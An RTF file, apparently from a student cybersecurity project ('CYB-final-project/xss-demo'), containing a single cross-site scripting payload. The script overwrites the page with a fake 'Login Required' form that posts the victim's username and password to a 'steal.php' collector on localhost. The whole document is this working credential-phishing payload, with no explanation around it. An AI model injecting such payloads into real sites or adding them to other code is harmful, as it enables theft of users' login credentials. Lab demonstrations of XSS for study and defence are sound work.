{\rtf1\ansi\ansicpg1252\cocoartf2822
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset178 GeezaPro;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww11520\viewh9000\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 <script>\
  document.body.innerHTML = `\
    <h2>Login Required</h2>\
    <form action="http://localhost/CYB-final-project/xss-demo/steal.php" method="POST">\
      <input name="username" placeholder="Username"><br>\
      <input name="password" type="password" placeholder="Password"><br>\
      <button>Login</button>\
    </form>\
  `;\
</script>}